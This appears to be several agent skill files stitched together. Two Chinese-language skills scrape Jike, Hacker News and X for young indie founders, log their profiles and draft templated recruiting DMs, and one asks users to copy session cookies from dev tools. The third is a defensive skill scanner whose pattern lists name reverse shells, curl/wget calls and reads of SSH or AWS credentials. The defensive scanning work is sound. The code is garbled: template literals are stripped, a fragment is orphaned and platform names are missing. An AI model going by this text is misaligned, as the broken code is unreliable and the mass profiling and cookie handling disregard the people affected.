@clawhub-robinc913-067585b106
在即刻平台挖掘vibecoding创业者人才。每…
---
name: jike-talent-hunter
description: 在即刻平台挖掘vibecoding创业者人才。每…
---
# 即刻人才挖掘
## 任务目标
每天在即刻平台挖掘15名符合画像的年轻人:
- 会用AI工具编程(vibecoding)
- 有创业精神
- 有独立做产品的能力
## 人才池
**存储位置**: `~/.openclaw/workspace-test/memory/talent-pool.json`
每次执行任务前,先读取人才池检查已存在的人,避免重复。
**数据结构**:
```json
{
"candidates": [
{
"jikeId": "用户ID",
"postUrl": "帖子链接",
"profileUrl": "个人主页链接",
"matchedReason": "为什么匹配",
"foundDate": "2026-03-19"
}
]
}
```
## 工作流程
### 第一步:接管浏览器并登录即刻
1. 使用 `browser` 工具接管浏览器:`browser(action=start, profile="openclaw")`
2. 导航到即刻:https://web.okjike.com
3. 如果用户未登录,提示用户扫码登录
4. 等待用户完成登录后,继续下一步
### 第二步:读取人才池查重
1. 读取 `~/.openclaw/workspace-test/memory/talent-pool.json`
2. 提取已收录的jikeId列表
### 第三步:搜索目标用户
在即刻搜索或浏览时,关键词组合:
- "vibe coding" / "vibecoding" / "AI编程"
- "独立开发" / "个人产品" / "自己做产品"
- "创业" / "副业" / "做自己的产品"
- "product hunt" / "indie hacker"
### 第四步:验证匹配
对每个潜在候选人,浏览其:
1. **帖子内容** - 确认有vibecoding实践、创业分享、产品发布等内容
2. **个人profile** - 确认是年轻人、有独立做产品的经历
判断标准(满足任一即可):
- 帖子中提到用AI工具开发产品并上线
- 分享自己做产品的过程和成果
- 有创业/做产品相关的持续输出
### 第五步:记录结果
对确认匹配的人,追加到人才池:
- jikeId: 用户在即刻的ID
- postUrl: 对应帖子链接
- profileUrl: 个人主页链接
- matchedReason: 简要说明匹配理由
- foundDate: 今天的日期 (YYYY-MM-DD格式)
### 第六步:完成指标
确保当天找到15个不重复的候选人后再结束。
## 输出格式
任务完成后,报告:
1. 本次找到的人数
2. 人才池总人数
3. 新增人员列表(jikeId + 帖子链接)
## 注意事项
- 必须先查重再记录,避免重复收录
- 每个候选人必须有对应的帖子链接作为验证依据
- 如果当天找不到15人,可以扩大搜索范围或换关键词
自动发现并精准招募 vibe coding 创业者。用于:当需要从技术社区(即刻、、Hacker News、X/Twitter 等)挖掘具备极客精神、会用 AI 工具编程、正在创业的年轻 maker,并生成个性化招募私信时。
---
name: maker-hunter-v2
description: 自动发现并精准招募 vibe coding 创业者。用于:当需要从技术社区(即刻、、Hacker News、X/Twitter 等)挖掘具备极客精神、会用 AI 工具编程、正在创业的年轻 maker,并生成个性化招募私信时。
---
# Maker Hunter V2
精准发现并招募 vibe coding 创业者的自动化工具。
## 1. 目标人群画像
**核心特征**:
- 极客精神:对技术有热情,喜欢折腾新工具
- Vibe Coding:熟练使用 AI 工具(Cursor、Windsurf、Claude Code 等)辅助编程
- 创业型:正在做自己的产品,有商业思维或已上线产品
- 年轻态:心态开放,愿意尝试新范式
**行为特征关键词**:
- #buildinpublic / #vibecoding / #indiehacker / #harness engineering
- 独立开发 / Solopreneur / Bootstrap
- AI 编程 / Prompt Engineering / Agent
- MVP / 产品思维 / 商业化
**排斥特征**:
- 纯打工心态、无个人项目
- 只发招聘帖的 HR
- 推广自家产品的营销号
- **知名公司高管(CEO/CTO/VP等)** - 这类人已是成功人士,不是目标人群
- 匹配分数低于 70%
---
## 2. 每日任务目标
| 平台 | 最低要求 |
|------|----------|
| **总计** | **20 个匹配度 >= 70% 的候选人** |
| 即刻 | 需要登录 |
| Hacker News | API 可用 |
| X/Twitter | 需要登录 |
**规则:**
- 匹配度分数 < 70% → 直接淘汰,不计入20人
- 高管(CEO/CTO/VP等)→ 直接淘汰,不计入20人
- 不够20人则继续抓取,直到凑齐
---
## 3. 平台策略与抓取方式
**浏览器说明:**
- 使用 Chrome 浏览器(系统已检测到 `/Applications/Google Chrome.app`)
- 使用 `browser` 工具控制浏览器
### 中国平台
| 平台 | 优先级 | 抓取方式 | 授权要求 |
|------|--------|----------|----------|
| **即刻** | P0 | 浏览器(Chrome) | 需要登录 |
### 外国平台
| 平台 | 优先级 | 抓取方式 | 授权要求 |
|------|--------|----------|----------|
| **Hacker News** | P0 | API | 无需登录 |
| **X/Twitter** | P1 | 浏览器(Chrome) | 需要登录 |
---
## 4. 用户资料审核流程(重要!)
**不仅要看帖子,还要看用户主页和历史帖子!**
### 审核步骤
1. **发现目标帖子** → 从关键词匹配的文章中发现潜在候选人
2. **访问用户主页** → 点击作者链接,进入其个人主页
3. **浏览历史帖子** → 查看最近 5-10 条历史帖子内容
4. **综合判断** → 根据历史内容判断是否符合目标画像
### 判断标准
**符合条件**:
- 历史帖子多次提到自己在做产品/项目
- 有产品链接、GitHub、正在开发中的内容
- 多次参与 vibe coding、AI 编程讨论
- 有独立开发、创业相关分享
**不符合条件**:
- 只转发/搬运内容,无个人创作
- 纯吐槽/抱怨类帖子
- 只发招聘帖或求工作帖
- 营销号/推广号
- **已知公司高管(CEO/CTO/COO/VP/Founder等)** - 这类人已经是成功人士,不符合独立开发者画像
### 高管检查(重要!)
每个候选人必须检查是否为知名公司高管:
1. **查看个人主页简介** - 是否有 CEO、CTO、Founder、Co-founder 等title
2. **搜索社交媒体** - 查看 LinkedIn、Twitter 等是否有公司职级信息
3. **查看历史帖子** - 是否多次提到自己创业成功、公司规模等
**如果是高管,直接跳过,不放入候选人名单**
---
## 5. 每日任务执行
### 目标
- **中国区:即刻找到 10 人**
- **外国区:Hacker News + X/Twitter 找到 10 人**
- **总计:20 人**
### 执行流程(串行执行)
```
【第一步:中国区】
1. 读取 memory/founders.json 获取历史名单
2. 读取 memory/daily.json 获取今日已处理
3. 立即主动打开浏览器,让用户登录即刻
4. 等待用户登录成功后,抓取即刻
5. 过滤:匹配度<70%淘汰、高管淘汰
6. 累加计数,达到10人后进入下一步
【第二步:外国区】
7. 让用户登录 X/Twitter
8. 等待用户登录成功后,抓取 Hacker News + X/Twitter
9. 过滤:匹配度<70%淘汰、高管淘汰
10. 累加计数,达到10人后进入下一步
【第三步:输出】
11. 在对话框输出完整候选人名单(20人)
```
### 浏览器登录流程
**【第一步】先打开即刻登录页面**
```
1. 使用 browser 工具打开 https://m.okjike.com/login
2. 提示用户:"请登录即刻"
3. 等待用户登录完成
4. 登录成功后开始抓取即刻
```
**【第二步】再打开 X/Twitter 登录页面**
```
1. 使用 browser 工具打开 https://x.com/login
2. 提示用户:"请登录 X/Twitter"
3. 等待用户登录完成
4. 登录成功后开始抓取
```
### 输出要求
任务完成后,在对话框输出完整 20 人名单:
- 中国区 10 人(即刻)
- 外国区 10 人(Hacker News + X/Twitter)
---
foreign: foreignCandidates.slice(0, FOREIGN_TARGET)
};
}
```
---
## 6. 去重机制
- **去重键**:`平台 + 用户名` 组合唯一
- **历史库**:memory/founders.json 存放全部历史候选人
- **今日库**:memory/daily.json 存放今日任务结果
### 去重检查实现
```javascript
// 构建当前候选人的去重键
const dedupKey = `platform:username`;
// 加载历史记录
const founders = JSON.parse(readFile('memory/founders.json'));
const daily = JSON.parse(readFile('memory/daily.json'));
// 构建已存在键的 Set
const seenKeys = new Set([
...founders.candidates.map(c => `c.platform:c.username`),
...daily.candidates.map(c => `c.platform:c.username`)
]);
// 检查是否重复
if (seenKeys.has(dedupKey)) {
console.log(`跳过重复: dedupKey`);
continue;
}
```
---
## 7. 输出格式(重要!)
### 中国候选人(中文私信)
```json
{
"region": "china",
"platform": "即刻",
"user_id": "12345678",
"username": "用户的即刻昵称",
"profile_url": "https://m.okjike.com/users/12345678",
"post_url": "https://m.okjike.com/posts/xxx",
"post_title": "帖子标题",
"match_score": 0.85,
"profile_summary": "用户在主页的简介(如果有)",
"history_review": "审核历史帖子后的总结,说明为何符合条件",
"dm_content": "Hi {username},看到你在即刻的帖子《{post_title}》{共鸣句}。\n\n{具体评价}。\n\n我们正在做一个___社区/项目,感觉你的___经历很适合一起聊聊。有兴趣可以加个微信或回复这封邮件。\n\n期待交流!"
}
```
### 外国候选人(英文私信)
```json
{
"region": "foreign",
"platform": "",
"user_id": "user123",
"username": "user123",
"profile_url": "https://www..com/user/user123",
"post_url": "https://www..com/r/indiehackers/comments/xxx",
"post_title": "Post Title",
"match_score": 0.85,
"profile_summary": "User's bio if available",
"history_review": "Summary of profile review, explaining why they match",
"dm_content": "Hi {username}, saw your post on {platform} - \"{post_title}\". {Resonance sentence}.\n\n{your specific observation}. {highlight quote}.\n\nWe're building a ___ community/project and think your ___ experience would be a great fit. Happy to chat if you're interested.\n\nLooking forward to connecting!"
}
```
### 私信生成规则
**中文模板(即刻)**:
```
Hi {username},看到你在{平台}的帖子《{post_title}》{共鸣句}。
{具体评价},{亮点引用}。
我们正在做一个面向独立开发者的社区/项目,感觉你的{经历}很适合一起聊聊。有兴趣可以加个微信或者回复这封邮件。
期待交流!
```
**英文模板(Hacker News//X)**:
```
Hi {username}, saw your post on {platform} - "{post_title}". {Resonance sentence}.
{your specific observation}. {highlight quote}.
We're building a community for indie developers and think your {experience} would be a great fit. Happy to chat if you're interested.
Looking forward to connecting!
```
**共鸣句库**:
- 中文:很有共鸣、这个思路很棒、太同频了、很有启发
- English: Really resonated with this, Great approach, Totally in sync, This is inspiring
**关键点**:
- 即刻用户 → 用中文写私信
- 外国平台用户 → 用英文写私信
- 私信必须提及帖子具体内容,证明认真读过
- 根据用户历史帖子内容定制化修改
---
## 8. 输出要求(重要!)
**每次任务必须同步输出完整候选人名单到对话框!**
### 输出要求
- 任务完成后立即在对话框输出
- 显示全部 20 个候选人的完整信息
- 每个候选人包含:平台、用户名、帖子链接、私信内容、匹配度
- 匹配度 < 70% 的不显示(已淘汰)
### 输出格式
```
=== 今日候选人 ===
🇨🇳 中国区(即刻)- X/10人
1. @用户名
平台:即刻
帖子:https://...
私信:[中文私信内容]
匹配度:XX%
🌍 外国区 (Hacker News / X/Twitter) - X/10人
1. @用户名
平台:Hacker News
帖子:https://...
私信:[英文私信内容]
匹配度:XX%
```
### 输出要求
- 每次运行后必须展示完整名单
- 私信内容必须完整显示(不要省略)
- 中国区用中文,外国区用英文
- 包含匹配度分数
---
## 8. 记忆系统
### 文件结构
```
~/.config/openclaw/maker-hunter/
├── credentials.json # 平台凭证
└── memory/
�} ├── founders.json # 历史候选人库
└── daily.json # 今日任务记录
```
### founders.json 格式
```json
{
"version": 1,
"updated_at": "2026-03-18T10:00:00Z",
"candidates": [
{
"region": "china",
"platform": "即刻",
"user_id": "12345678",
"username": "用户昵称",
"profile_url": "https://m.okjike.com/users/12345678",
"found_at": "2026-03-18",
"post_url": "https://m.okjike.com/posts/xxx"
}
]
}
```
### daily.json 格式
```json
{
"date": "2026-03-18",
"target_china": 10,
"target_foreign": 10,
"found_china": 10,
"found_foreign": 10,
"candidates": [...]
}
```
---
## 9. 平台抓取详情
### 即刻 (P0 - 需 cookie)
**状态**:需要用户登录后提供 cookie
**登录流程**:
```
1. 浏览器登录即刻
2. 打开开发者工具 (F12) → Application → Cookies
3. 复制 cookie 值提供给我
```
**关键词**:
- 独立开发、AI 编程、vibe coding、创业、产品思维
### Hacker News (P0)
**端点**:`https://hacker-news.firebaseio.com/v0/`
**抓取逻辑**:
1. 获取 Top Stories ID 列表 (`topstories.json`)
2. 取前 50 条获取详细内容 (`item/{id}.json`)
3. 过滤匹配关键词的帖子
**关键词**:vibe coding, AI coding, indie hacker, build in public, startup
### (P0)
**端点**:`https://www..com/r/{sub}/new.json`
**目标 sub**:
- r/indieweb
- r/startups
- r/indiehackers
**关键词**:vibe coding, AI coding, indie hacker, solo founder, MVP, launch
### X/Twitter (P1 - 需浏览器登录)
**状态**:需要用户登录后才能抓取
**登录流程**:
```
1. 使用 browser 工具打开 https://x.com/login
2. 用户扫码/输入账号密码完成登录
3. 登录成功后搜索:build in public indie hacker vibe coding
```
---
## 10. 评分机制
每个候选人计算 match_score (0-1):
| 因素 | 权重 | 说明 |
|------|------|------|
| 关键词匹配 | 0.3 | 帖子含目标关键词数量 |
| 个人主页审核 | 0.4 | 主页介绍是否符合 |
| 历史帖子审核 | 0.3 | 历史帖子是否符合目标画像 |
分数 > 0.7 才输出。
---
## 11. 执行命令
手动执行每日任务:
```bash
# 直接运行脚本
node ~/.npm-global/lib/node_modules/openclaw/skills/maker-hunter-v2/scripts/hunter.cjs
```
首次使用需要创建 memory 目录:
```bash
mkdir -p ~/.config/openclaw/maker-hunter/memory
```
FILE:references/dm-guide.md
# DM 模板参考
## 高转化率模板结构
```
Hi {username},
{开场共鸣 - 基于帖子内容}
{具体评价 - 引用帖子细节}
{价值提供 - 我们做什么、为什么适合他}
{行动号召 - 具体的下一步}
期待交流!
```
## 模板变体
### 变体 1:产品导向
```
Hi {username},看到你的 {post_title},很有共鸣!
你现在在做 {产品/项目类型},其实我们也在做一个类似的事情。我们发现 {痛点},
感觉你的经验可以帮到我们。
如果你有兴趣,可以约个时间聊聊,大家交个朋友。
```
### 变体 2:技术导向
```
Hi {username},你在 {post_title} 里提到的 {技术点} 很有趣!
我们最近在折腾 {相关技术},看到你在这一块的探索很想认识一下。
有空的话可以交流一下?
```
### 变体 3:社区导向
```
Hi {username},看到你在 {platform} 的分享,感觉你是一个很棒的 maker!
我们在构建一个 {社区定位} 的社群,聚集了一批 {目标人群}。
你的背景很适合这个圈子,有没有兴趣加入?
```
## 平台定制化
| 平台 | 称呼习惯 | 语气 |
|------|----------|------|
| Reddit | 直呼用户名 | 稍微随意 |
| DEV.to | @用户名 | 友好技术风 |
| V2ese | "兄dei" / "兄弟" | 亲切 |
| 掘金 | "掘友" | 友好 |
## 行动号召示例
- "可以加个微信聊聊吗?"
- "有空可以约个 coffee chat"
- "回复这封邮件就行"
- "我在 Slack/Discord 社区,等你"
- "拉你进我们的开发者群"
---
# 平台配置详情
## V2EX
节点:
- `/go/startup` - 创业
- `/go/career` - 职业
- `/go/programmer` - 程序员
Cookie 获取:
1. 登录 V2EX
2. F12 → Application → Cookies → v2ex.com
3. 复制 cookie 值
## 稀土掘金
Cookie 获取:
1. 登录掘金
2. F12 → Application → Cookies → juejin.cn
3. 复制 cookie
---
# 关键词扩展
## 目标关键词(加分)
### 工具相关
- cursor, windsurf, claude code, bolt, v0, Lovable
- GitHub Copilot, Amazon CodeWhisperer
- LLM, GPT, Claude, Gemini
- AI coding, AI programming
### 创业相关
- indie hacker, solopreneur, bootstrap
- build in public, launched, shipping
- MVP, prototype, iterate
- revenue, monetize, pricing
### 社区相关
- maker, creator, founder
- startup, bootstrapped
- #buildinpublic, #vibecoding
## 排斥关键词(减分)
- 招聘, hiring, job, 工作
- 薪资, salary, 待遇
- 面试, interview
- 培训, 课程, 付费
- 营销号, 推广 (软广)
360-degree comprehensive security review Skill. Use before installing any Skill from ClawHub, GitHub, or other sources. Performs full security scans includin...
---
name: 360Guard
description: 360-degree comprehensive security review Skill. Use before installing any Skill from ClawHub, GitHub, or other sources. Performs full security scans including all Skill Vetter checks plus extended system/privacy/behavior checks and automated scanning scripts. Supports static analysis, behavior detection, dependency auditing.
---
# 360Guard 🛡️
> 360-degree comprehensive security review — Like antivirus for your Skills
## 1. When to Use
- Before installing any Skill from ClawHub
- Before installing any Skill from GitHub or other sources
- When evaluating code shared by other Agents
- Any time you're asked to install unknown code
- Periodic audit of installed Skills (recommended monthly)
- Before running high-risk Skills for second verification
## 2. Core Principles
```
┌─────────────────────────────────────────────────────────────┐
│ 🛑 Security Layer Priority │
├─────────────────────────────────────────────────────────────┤
│ ⛔ EXTREME → Absolutely refuse to install │
│ 🔴 HIGH → Requires human approval │
│ 🟡 MEDIUM → Full code review + limited permissions │
│ 🟢 LOW → Basic review OK │
└─────────────────────────────────────────────────────────────┘
```
## 3. Security Checklist
### 3.1 Base Red Flags (from Skill Vetter)
```
🚨 Reject immediately if you see:
────────────────────────────────────────────────────────────
• curl/wget to unknown URLs
• Sends data to external servers
• Requests credentials/tokens/API keys
• Reads ~/.ssh, ~/.aws, ~/.config without clear reason
• Accesses MEMORY.md, USER.md, SOUL.md, IDENTITY.md
• Uses base64 decode on anything
• Uses eval() or exec() with external input
• Modifies system files outside workspace
• Installs packages without listing them
• Network calls to IPs instead of domains
• Obfuscated code (compressed, encoded, minified)
• Requests elevated/sudo permissions
• Accesses browser cookies/sessions
• Touches credential files
────────────────────────────────────────────────────────────
```
### 3.2 Extended Red Flags (New)
#### 3.2.1 Persistence & Auto-start
```
🔴 Persistence check:
• Creates cron job / systemd service
• Modifies ~/.ssh/authorized_keys
• Writes to /etc/hosts
• Adds Login Items / Startup Items
• Modifies .bashrc / .zshrc / profile
• Registers LaunchAgent (macOS)
• Installs systemd user service
```
#### 3.2.2 Monitoring & Eavesdropping
```
🔴 Monitoring permissions check:
• Requests screen capture/recording (screencapture)
• Requests audio recording permission
• Keyloggers
• Accesses microphone/camera
• File system monitoring (fswatch/inotify)
```
#### 3.2.3 Data & Privacy
```
🔴 Data theft check:
• Reads clipboard (pbpaste)
• Reads environment variables (especially API_, SECRET, TOKEN)
• Accesses browser history/bookmarks
• Accesses macOS Keychain
• Accesses iMessage/SMS
• Accesses contacts/calendar
• Accesses photo library
```
#### 3.2.4 Network & Communication
```
🔴 Network anomaly check:
• Initiates reverse shell (nc -e / bash -i)
• Uses Tor proxy
• DNS queries to suspicious domains
• WebSocket long connections
• IRC connections
• Non-standard ports (>65535 or <1024 unusual)
• Hardcoded IP addresses (non-local)
```
#### 3.2.5 Code Execution (Advanced)
```
🔴 Dynamic execution check:
• Dynamic import (importlib.import_module)
• __import__() dynamic loading
• compile() dynamic compilation
• xmlrpc / jsonrpc remote calls
• pickle / yaml / marshal deserialization
• exec() / eval() any string
• subprocess shell=True
```
#### 3.2.6 File System
```
🟡 File operation check:
• Writes to executable paths outside /tmp
• Modifies /usr/local/bin
• Writes .dmg/.pkg installers
• Creates .hidden files/directories
• File permission modification (chmod +x)
• Symbolic links (pointing external)
• Contains binary files (.so/.dylib/.exe/.bin)
```
#### 3.2.7 Dependencies & Supply Chain
```
🟡 Supply chain check:
• Dependency version range too wide (>1.0.0 not ^1.0.0)
• Dependencies from private/unknown sources
• Dependencies on deprecated packages
• Silent additional dependency downloads
• References other unvetted Skills
• Uses git submodule (may point to malicious repo)
```
#### 3.2.8 Social Engineering
```
🟡 Social engineering check:
• Mimics popular Skill names (e.g., "github", "weather-ai")
• README overpromises ("one-click to do everything...")
• No source code, only compiled binaries
• Author has no history
• Downloads vs stars ratio suspicious (fake reviews)
```
---
## 4. Risk Classification
| Risk Level | Example Checks | Action |
|------------|----------------|--------|
| 🟢 LOW | Text processing, weather, note formatting | Basic review, OK to install |
| 🟡 MEDIUM | File I/O, browser control, API calls | Full review + limited permissions |
| 🔴 HIGH | Credential access, Keychain, network requests | Human approval + sandbox test |
| ⛔ EXTREME | Persistence, root access, keylogging, reverse shell | **Refuse** |
---
## 5. Trust Hierarchy
| Source | Review Level | Recommendation |
|--------|--------------|----------------|
| Official OpenClaw Skills | Low (still review) | Basic check |
| High-star Repo (1000+) | Medium | Standard check |
| Known Authors | Medium | Standard check |
| Unknown Sources | High | Full check |
| Requests credentials | Extreme | **Refuse** |
| Modifies system files | Extreme | **Refuse** |
---
## 6. Automated Scanning Scripts
### 6.1 Quick Scan (quick-scan.sh)
```bash
#!/bin/bash
# Usage: ./quick-scan.sh /path/to/skill
# Output: Quick risk assessment report
SKILL_PATH=$1
echo "🔍 360Guard Quick Scan: $SKILL_PATH"
echo "================================"
# Check dangerous functions
echo -e "\n📡 Network request check:"
grep -r "curl\|wget\|fetch\|http\.\|https\.\|socket" "$SKILL_PATH" --include="*.sh" --include="*.js" --include="*.py" | head -5
# Check sensitive file access
echo -e "\n🔑 Sensitive path check:"
grep -r "~/.ssh\|~/.aws\|~/.config\|/etc/hosts\|authorized_keys" "$SKILL_PATH" --include="*.sh" --include="*.js" --include="*.py"
# Check dangerous commands
echo -e "\n⚠️ Dangerous command check:"
grep -r "eval\|exec\|shell=True\|base64 -d\|openssl" "$SKILL_PATH" --include="*.sh" --include="*.js" --include="*.py"
echo -e "\n✅ Quick scan complete"
```
### 6.2 Full Scan (full-scan.sh)
```bash
#!/bin/bash
# Usage: ./full-scan.sh /path/to/skill
# Output: Complete security assessment report
SKILL_PATH=$1
REPORT="$SKILL_PATH/360guard-report.txt"
echo "🛡️ 360Guard Full Scan: $SKILL_PATH" | tee "$REPORT"
echo "========================================" | tee -a "$REPORT"
# 1. File structure check
echo -e "\n📁 File structure:" | tee -a "$REPORT"
find "$SKILL_PATH" -type f | head -20 | tee -a "$REPORT"
# 2. Dangerous function scan
echo -e "\n⚠️ Dangerous function scan:" | tee -a "$REPORT"
for pattern in "eval(" "exec(" "shell=True" "base64" "subprocess" "importlib" "__import__" "pickle" "yaml.load" "xmlrpc" "socket.create_connection"; do
result=$(grep -r "$pattern" "$SKILL_PATH" --include="*.sh" --include="*.js" --include="*.py" 2>/dev/null)
if [ -n "$result" ]; then
echo " ❌ Found: $pattern" | tee -a "$REPORT"
echo "$result" | head -3 | tee -a "$REPORT"
fi
done
# 3. Sensitive path scan
echo -e "\n🔑 Sensitive path scan:" | tee -a "$REPORT"
for pattern in "~/.ssh" "~/.aws" "~/.config" "/etc/hosts" "authorized_keys" "keychain" "credentials" ".env"; do
result=$(grep -r "$pattern" "$SKILL_PATH" --include="*.sh" --include="*.js" --include="*.py" 2>/dev/null)
if [ -n "$result" ]; then
echo " ⚠️ Warning: $pattern" | tee -a "$REPORT"
fi
done
# 4. Network request scan
echo -e "\n🌐 Network request scan:" | tee -a "$REPORT"
grep -r "http://\|https://\|wget\|curl\|fetch" "$SKILL_PATH" --include="*.sh" --include="*.js" --include="*.py" | grep -v "^#" | head -10 | tee -a "$REPORT"
# 5. Persistence check
echo -e "\n⏰ Persistence check:" | tee -a "$REPORT"
for pattern in "cron" "systemd" "launchd" "login item" "startup" "autostart"; do
result=$(grep -ri "$pattern" "$SKILL_PATH" --include="*.sh" --include="*.js" --include="*.py" 2>/dev/null)
if [ -n "$result" ]; then
echo " 🔴 High risk: $pattern" | tee -a "$REPORT"
fi
done
# 6. Dependency check
echo -e "\n📦 Dependency check:" | tee -a "$REPORT"
if [ -f "$SKILL_PATH/package.json" ]; then
cat "$SKILL_PATH/package.json" | grep -E "dependencies|devDependencies" -A 20 | tee -a "$REPORT"
fi
if [ -f "$SKILL_PATH/requirements.txt" ]; then
cat "$SKILL_PATH/requirements.txt" | tee -a "$REPORT"
fi
if [ -f "$SKILL_PATH/package.yaml" ]; then
cat "$SKILL_PATH/package.yaml" | tee -a "$REPORT"
fi
# 7. Binary file check
echo -e "\n💾 Binary file check:" | tee -a "$REPORT"
find "$SKILL_PATH" -type f \( -name "*.so" -o -name "*.dylib" -o -name "*.exe" -o -name "*.bin" -o -name "*.dll" \) 2>/dev/null | tee -a "$REPORT"
echo -e "\n========================================" | tee -a "$REPORT"
echo "✅ Full scan complete, report saved to: $REPORT"
```
### 6.3 Node.js Scanner (scanner.js)
```javascript
#!/usr/bin/env node
/**
* 360Guard Node.js Scanner
* Usage: node scanner.js /path/to/skill
*/
const fs = require('fs');
const path = require('path');
const { execSync } = require('child_process');
const DANGER_PATTERNS = {
CRITICAL: [
{ pattern: /eval\s*\(/, name: 'eval() execution' },
{ pattern: /exec\s*\(/, name: 'exec() execution' },
{ pattern: /shell\s*=\s*true/i, name: 'subprocess shell=True' },
{ pattern: /base64.*decode/i, name: 'base64 decode' },
{ pattern: /pickle\.load/i, name: 'pickle deserialization' },
{ pattern: /yaml\.load/i, name: 'yaml deserialization' },
{ pattern: /__import__\s*\(/, name: 'dynamic import' },
{ pattern: /importlib\.import_module/i, name: 'dynamic module load' },
{ pattern: /xmlrpc/i, name: 'XML-RPC remote call' },
{ pattern: /reverse.*shell|nc\s+-e|bash\s+-i/i, name: 'reverse shell' }
],
HIGH: [
{ pattern: /curl\s+/, name: 'curl request' },
{ pattern: /wget\s+/, name: 'wget download' },
{ pattern: /fetch\s*\(/, name: 'fetch request' },
{ pattern: /https?:\/\/\d{1,3}\.\d{1,3}/, name: 'direct IP connection' },
{ pattern: /process\.env/i, name: 'environment variable access' },
{ pattern: /child_process/, name: 'subprocess execution' }
],
MEDIUM: [
{ pattern: /\/\.ssh\//, name: 'SSH directory access' },
{ pattern: /\/\.aws\//, name: 'AWS directory access' },
{ pattern: /keychain/i, name: 'Keychain access' },
{ pattern: /credentials|token|secret/i, name: 'credential related' },
{ pattern: /cron|systemd|launchd/i, name: 'persistence mechanism' }
]
};
function scanFile(filePath) {
const results = { CRITICAL: [], HIGH: [], MEDIUM: [] };
try {
const content = fs.readFileSync(filePath, 'utf8');
for (const [level, patterns] of Object.entries(DANGER_PATTERNS)) {
for (const { pattern, name } of patterns) {
if (pattern.test(content)) {
results[level].push({ file: filePath, issue: name });
}
}
}
} catch (e) {
// Skip unreadable files
}
return results;
}
function scanDirectory(dirPath) {
const allResults = { CRITICAL: [], HIGH: [], MEDIUM: [] };
function walk(dir) {
const files = fs.readdirSync(dir);
for (const file of files) {
const fullPath = path.join(dir, file);
const stat = fs.statSync(fullPath);
if (stat.isDirectory() && !file.startsWith('.')) {
walk(fullPath);
} else if (stat.isFile()) {
const ext = path.extname(file);
if (['.js', '.ts', '.py', '.sh', '.bash'].includes(ext)) {
const results = scanFile(fullPath);
for (const level of Object.keys(allResults)) {
allResults[level].push(...results[level]);
}
}
}
}
}
walk(dirPath);
return allResults;
}
function generateReport(skillPath, results) {
console.log('\n🛡️ 360Guard Security Scan Report');
console.log('='.repeat(50));
console.log(`📂 Scan path: skillPath`);
console.log('');
const riskOrder = ['CRITICAL', 'HIGH', 'MEDIUM'];
const emoji = { CRITICAL: '🔴', HIGH: '⚠️', MEDIUM: '🟡' };
for (const level of riskOrder) {
if (results[level].length > 0) {
console.log(`\nemoji[level] level risk (results[level].length items):`);
for (const item of results[level]) {
console.log(` • item.issue`);
console.log(` File: item.file`);
}
}
}
console.log('\n' + '='.repeat(50));
if (results.CRITICAL.length > 0) {
console.log('🔴 Conclusion: Critical risks found, NOT recommended to install');
process.exit(1);
} else if (results.HIGH.length > 0) {
console.log('⚠️ Conclusion: High risk found, human approval required');
process.exit(2);
} else if (results.MEDIUM.length > 0) {
console.log('🟡 Conclusion: Medium risk found, please review carefully');
process.exit(0);
} else {
console.log('✅ Conclusion: No obvious risks found');
process.exit(0);
}
}
// Main
const skillPath = process.argv[2] || '.';
if (!fs.existsSync(skillPath)) {
console.error('❌ Path does not exist:', skillPath);
process.exit(1);
}
const stat = fs.statSync(skillPath);
const results = stat.isDirectory() ? scanDirectory(skillPath) : scanFile(skillPath);
generateReport(skillPath, results);
```
---
## 7. Output Format
After vetting, produce this format:
```
╔══════════════════════════════════════════════════════════╗
║ 🛡️ 360Guard Security Review Report ║
╠══════════════════════════════════════════════════════════╣
║ Skill Name: [name] ║
║ Source: [ClawHub / GitHub / other] ║
║ Author: [username] ║
║ Version: [version] ║
╠══════════════════════════════════════════════════════════╣
║ 📊 Scan Statistics ║
║ • File count: [count] ║
║ • Lines of code: [count] ║
║ • Dependencies: [count] ║
╠══════════════════════════════════════════════════════════╣
║ 🚨 Issues Found ║
║ 🔴 Critical: [count] ║
║ ⚠️ High: [count] ║
║ 🟡 Medium: [count] ║
╠══════════════════════════════════════════════════════════╣
║ 📋 Detailed Issue List ║
║ [List each issue with file location, type, risk level] ║
╠══════════════════════════════════════════════════════════╣
║ 💾 Permissions Required ║
║ • File read: [list or "None"] ║
║ • File write: [list or "None"] ║
║ • Network: [list or "None"] ║
║ • Commands: [list or "None"] ║
╠══════════════════════════════════════════════════════════╣
║ 🎯 Risk Level: [🟢 LOW / 🟡 MEDIUM / 🔴 HIGH / ⛔ EXTREME] ║
╠══════════════════════════════════════════════════════════╣
║ ⚖️ Final Verdict ║
║ [✅ Safe to install / ⚠️ Install with caution / ❌ Do not install] ║
╠══════════════════════════════════════════════════════════╣
║ 📝 Notes ║
║ [Any other observations and recommendations] ║
╚══════════════════════════════════════════════════════════╝
```
---
## 8. Quick Commands
### Vet ClawHub Skill
```bash
# Method 1: Download and scan
wget -O skill.zip "https://clawhub.ai/api/download/SKILL_NAME"
unzip skill.zip
node ~/.npm-global/lib/node_modules/openclaw/skills/360guard/scripts/scanner.cjs ./SKILL_NAME
rm -rf skill.zip SKILL_NAME
# Method 2: GitHub repo scan
curl -s "https://api.github.com/repos/OWNER/REPO" | jq '{stars: .stargazers_count, updated: .updated_at}'
git clone https://github.com/OWNER/REPO
node ~/.npm-global/lib/node_modules/openclaw/skills/360guard/scripts/scanner.cjs ./REPO
```
### Quick Vet Commands
```bash
# Check repo stats
curl -s "https://api.github.com/repos/OWNER/REPO" | jq '{stars, forks, updated, language}'
# List all files
curl -s "https://api.github.com/repos/OWNER/REPO/contents/" | jq '.[].name'
# Get SKILL.md
curl -s "https://raw.githubusercontent.com/OWNER/REPO/main/SKILL.md"
```
---
## 9. Remember
- ❌ No Skill is worth compromising security
- ❓ When in doubt, don't install
- 🧑🦰 High-risk decisions: ask your human
- 📝 Document your vetting for future reference
- 🔄 Periodically re-vet installed Skills
---
> 🛡️ **360Guard** — 360-degree security for your Agent
FILE:CHANGELOG.md
# 360Guard vs Skill Vetter Comparison Report
> 360Guard is built on top of Skill Vetter, enhanced version
---
## 📊 Overall Comparison
| Dimension | Skill Vetter | 360Guard |
|-----------|--------------|----------|
| **Check Items** | ~15 items | ~50+ items |
| **Risk Levels** | 4 levels | 4 levels + detailed subcategories |
| **Automated Scripts** | None | 3 (Quick/Full/Node.js) |
| **Output Reports** | Manual template | Auto-generated + multiple formats |
| **Supply Chain Checks** | None | Yes |
| **Social Engineering Checks** | None | Yes |
---
## ✅ New Check Items (compared to Vetter)
### 1. Persistence & Auto-start 🔴
